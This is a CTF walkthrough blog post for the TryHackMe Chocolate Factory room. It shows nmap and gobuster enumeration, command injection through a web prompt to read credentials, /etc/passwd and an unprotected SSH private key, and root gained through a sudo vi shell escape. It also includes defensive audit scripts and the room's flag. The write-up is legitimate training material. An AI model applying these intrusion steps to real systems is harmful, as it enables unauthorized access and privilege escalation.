TryHackMe | Chocolate Factory

Ricardo Ribas
6 min read, Mar 5, 2023


This is one (of many) walkthroughs for the Chocolate Factory CTF room. As always, I follow a few simple enumeration steps and walk through the potential flaws they expose in this article.

Enumeration

As usual, I use nmap to see which ports are open.

$ nmap $IP-ADDRESS

Starting Nmap 7.60 ( https://nmap.org ) at 2023-02-24 16:04 GMT
Nmap scan report for ip-10-10-44-122.eu-west-1.compute.internal (10.10.44.122)
Host is up (0.0014s latency).
Not shown: 989 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
100/tcp open newacct
106/tcp open pop3pw
109/tcp open pop2
110/tcp open pop3
111/tcp open rpcbind
113/tcp open ident
119/tcp open nntp
125/tcp open locus-map
MAC Address: 02:59:04:96:EF:5D (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.60 seconds

The scan shows several open ports, including port 80 for the web server and port 21 for FTP. Following my usual steps, I first tried to log in to the FTP server as the anonymous user.

$ ftp $IP-ADDRESS

Connected to $IP-ADDRESS.
220 (vsFTPd 3.0.3)
Name (10.10.44.122:root): Anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r-- 1 1000 1000 208838 Sep 30 2020 gum_room.jpg
226 Directory send OK.
ftp>

I was able to download an image file from the FTP server; we will come back to it later to see whether it holds anything useful. Next, we can run a directory brute-forcer (gobuster, below) to discover hidden folders and files on the web server.

gobuster dir -u http://$IP-ADDRESS -x html,txt,php,js -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://$IP-ADDRESS
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: html,txt,php,js
[+] Timeout: 10s
===============================================================
2023/02/24 16:08:43 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
...
/home.php (Status: 200)
/index.html (Status: 200)
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2023/02/24 16:08:46 Finished
===============================================================

The index.html page didn't have anything useful. However, home.php looked pretty interesting, as it rendered a command-line prompt. By running simple commands such as ls and pwd, we could enumerate several files under the web server folder.

# run ls
ls

# the webpage returned those results
home.jpg home.php image.png index.html index.php.bak key_rev_key validate.php

After running ls, I quickly noticed a file named key_rev_key that looked like it could mean something. It also seemed that cat was not a blacklisted command at all, since I could dump the contents of what looked like an executable.

Running a quick strings on it, something caught my eye.

# FROM THM VM
$ strings key_rev_key
...
Enter your name:
laksdhfas
congratulations you have found the key:
b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='
Keep its safe
Bad name!
...

That looked like the contents of the key we were supposed to find, and it answered the first question.

Furthermore, investigating the other pages that gobuster had not found, index.php.bak turned out to be simply a backup of the home page. Nothing to add there. The contents of validate.php, however, were a bit harder to fetch: requesting it directly always returned "invalid credentials" and redirected us to the index page. At this point my hope was to replay the command-line prompt's POST request with curl and read the validate page through it. After checking the network requests in Firefox's developer tools, I quickly found the request the prompt makes.

# FROM THE THM VM
$ curl -X POST http://IP-ADDRESS/home.php -d "command=cat+validate.php"
....OTHER-HTML-CONTENT
<?php
$uname=$_POST['uname'];
$password=$_POST['password'];
if($uname=="charlie" && $password=="cn7824"){
echo "<script>window.location='home.php'</script>";
}
else{
echo "<script>alert('Incorrect Credentials');</script>";
echo "<script>window.location='index.html'</script>";
}
?></body>
</html>

From the output, the answer to the second question was just in front of my eyes.

At this point, I didn't have much information at my disposal beyond the command-line prompt and a potential password.

Let's see if we can list other directories and hidden files. For simplicity, the outputs of the following commands are what the home page rendered.

# where am at?
$ pwd
/var/www/html

# list other directories
$ ls /home
charlie

# print the /etc/passwd file (/etc/shadow was not possible to print)
$ cat /etc/passwd
...
root:x:0:0:root:/root:/bin/bash
charlie:x:1000:1000:localhost:/home/charley:/bin/bash
...

# print the charlie directory
$ ls /home/charlie
teleport teleport.pub user.txt

# can we print the user flag?
$ cat /home/charlie/user.txt
--empty-output--

# can we print the teleport and teleport.pub?
$ cat /home/charlie/teleport

-----BEGIN RSA PRIVATE KEY-----
....
-----END RSA PRIVATE KEY-----

From all these attempts to gather intel on potential ways into the server, charlie's private key looked like our way in. I wanted to try something else first, though. Entering charlie's potential credentials in the home sign-in page produced nothing spectacular: I was simply redirected to the home page. Even with the correct credentials, I could not retrieve the contents of the first flag.

Back to the private key. The output from the command-line prompt was not clean enough for John the Ripper to convert it into a hash to crack. I had to remove some tabs and fix the structure of the key. If it takes you a while to get it working, don't worry; it took me several minutes before John accepted it as well.

# FROM THE THM VM
$ /opt/john/ssh2john teleport
teleport has no password!

Wait. What? No password? This is too good to be true. If I attempt to enter the server through ssh, I’ll have a red carpet waiting for me? 😙
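As an added example (my code, not part of the original walkthrough), here is a small Python audit that performs offline the check ssh2john reported above: it tells whether a private key file is passphrase-protected, for both the legacy PEM layout the teleport key used and the newer OpenSSH format. The key bodies below are constructed placeholders, not real keys.

```python
import base64
import struct
from typing import Optional

LEGACY_HEADERS = ("-----BEGIN RSA PRIVATE KEY-----", "-----BEGIN DSA PRIVATE KEY-----",
                  "-----BEGIN EC PRIVATE KEY-----")
OPENSSH_HEADER = "-----BEGIN OPENSSH PRIVATE KEY-----"
OPENSSH_MAGIC = b"openssh-key-v1\x00"


def _read_string(buf: bytes, off: int):
    """Read one length-prefixed SSH string at offset off; return (value, next offset)."""
    (length,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + length], off + 4 + length


def key_is_encrypted(key_text: str) -> Optional[bool]:
    """True/False for a recognised private key, None if the text is not one."""
    lines = [ln.strip() for ln in key_text.strip().splitlines()]
    if not lines:
        return None
    if lines[0] in LEGACY_HEADERS:
        # Legacy PEM keys are only protected when they carry a Proc-Type/DEK-Info header.
        return any(ln.startswith("Proc-Type:") and "ENCRYPTED" in ln for ln in lines[1:])
    if lines[0] == OPENSSH_HEADER:
        body = "".join(ln for ln in lines[1:] if not ln.startswith("-----"))
        blob = base64.b64decode(body)
        if not blob.startswith(OPENSSH_MAGIC):
            return None
        # After the magic come ciphername and kdfname; "none" means no passphrase.
        cipher, off = _read_string(blob, len(OPENSSH_MAGIC))
        kdf, _ = _read_string(blob, off)
        return cipher != b"none" and kdf != b"none"
    return None


def openssh_sample(cipher: bytes, kdf: bytes) -> str:
    """Constructed minimal OpenSSH-format body (not a real key) to exercise the parser."""
    blob = OPENSSH_MAGIC + struct.pack(">I", len(cipher)) + cipher + struct.pack(">I", len(kdf)) + kdf
    return f"{OPENSSH_HEADER}\n{base64.b64encode(blob).decode()}\n-----END OPENSSH PRIVATE KEY-----\n"


# Constructed legacy samples: the first is shaped like charlie's unprotected "teleport" key.
UNPROTECTED_LEGACY = "-----BEGIN RSA PRIVATE KEY-----\nMIIEnotarealkeybody\n-----END RSA PRIVATE KEY-----\n"
PROTECTED_LEGACY = ("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
                    "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\nnotarealciphertext\n"
                    "-----END RSA PRIVATE KEY-----\n")

if __name__ == "__main__":
    for name, text in (("teleport-like", UNPROTECTED_LEGACY), ("protected", PROTECTED_LEGACY)):
        print(f"{name}: {'passphrase-protected' if key_is_encrypted(text) else 'NO passphrase'}")
```

Pointed at a real ~/.ssh directory, the same function is a quick way to find keys that would give anyone who can read them (such as a web server user, as here) immediate SSH access.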

# give the right permissions
$ chmod 600 teleport
$ ssh -i teleport charlie@IP-ADDRESS
...
charlie@chocolate-factory:/$ whoami
charlie

Well, it blends! I am in as charlie. The user flag is just around the corner. Go grab it!

Privilege Escalation

The rest of the CTF introduced some new challenges. The very first thing to do was to list the commands I was allowed to execute through sudo as charlie.

charlie@chocolate-factory:/$ sudo -l
Matching Defaults entries for charlie on chocolate-factory:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User charlie may run the following commands on chocolate-factory:
(ALL : !root) NOPASSWD: /usr/bin/vi
charlie@chocolate-factory:/$

From the output, I could run vi through sudo without entering a password. Same old, same old. Following the GTFOBins entry for vi, I escalated my privileges.
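As an added audit example (my code, not from the room or GTFOBins), the following Python parses sudo -l output like the one above and flags rules that require no password or hand out a program able to spawn a shell or edit arbitrary files. The second rule in the sample is constructed to show a rule that is not flagged.

```python
import re
from os.path import basename

# Constructed sample, shaped like the sudo -l output from the box (second rule invented).
SUDO_L_OUTPUT = r"""Matching Defaults entries for charlie on chocolate-factory:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User charlie may run the following commands on chocolate-factory:
    (ALL : !root) NOPASSWD: /usr/bin/vi
    (root) /usr/bin/systemctl restart apache2
"""

# Editors, pagers and interpreters that can start a shell or write any file once elevated.
SHELL_CAPABLE = {"vi", "vim", "nano", "less", "more", "python", "python3", "perl",
                 "find", "awk", "bash", "sh"}

# "(runas) TAG: TAG: command args" as printed by sudo -l.
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")


def parse_rules(text: str):
    """Return [{'runas', 'tags', 'cmd'}] for every rule after the 'may run' line."""
    rules, in_rules = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules and line else None
        if m:
            tags = {t.rstrip(":") for t in m.group("tags").split()}
            rules.append({"runas": m.group("runas"), "tags": tags, "cmd": m.group("cmd").strip()})
    return rules


def audit(text: str):
    """Return (cmd, runas, [reasons]) for every rule worth a second look."""
    findings = []
    for r in parse_rules(text):
        prog = "ALL" if r["cmd"] == "ALL" else basename(r["cmd"].split()[0])
        reasons = []
        if "NOPASSWD" in r["tags"]:
            reasons.append("no password required")
        if prog == "ALL" or prog in SHELL_CAPABLE:
            reasons.append(f"{prog} can spawn a shell or edit arbitrary files")
        if reasons:
            findings.append((r["cmd"], r["runas"], reasons))
    return findings
```

Run over the sample it reports only the vi rule, with both reasons; the systemctl rule passes because it is password-protected and pinned to a fixed argument list.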

$ sudo vi -c ':!/bin/sh' /dev/null
$ whoami
root

# access root folder
$ cd /root
$ ls /root
root.py

This one looked different from the other CTFs I have tried: a Python file asking for a key. Could the key I used to answer the first question let me finish the CTF? Let's find out.

# FROM THE SSH SESSION
$ python root.py
Enter the key: b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='

[ASCII-art banner printed by root.py: "You Are Now The Owner Of Chocolate Factory"]

flag{cec59161d338fef787fcb4e296b42124}

You are now the owner of the chocolate factory!

Conclusion

Even though I am not very familiar with the Chocolate Factory movies, I found this CTF really interesting. Some of the answers were not so obvious, and the final challenge was kind of unexpected. Kudos to 0x9747, saharshtapi and AndyInfoSec for creating this one! 👍
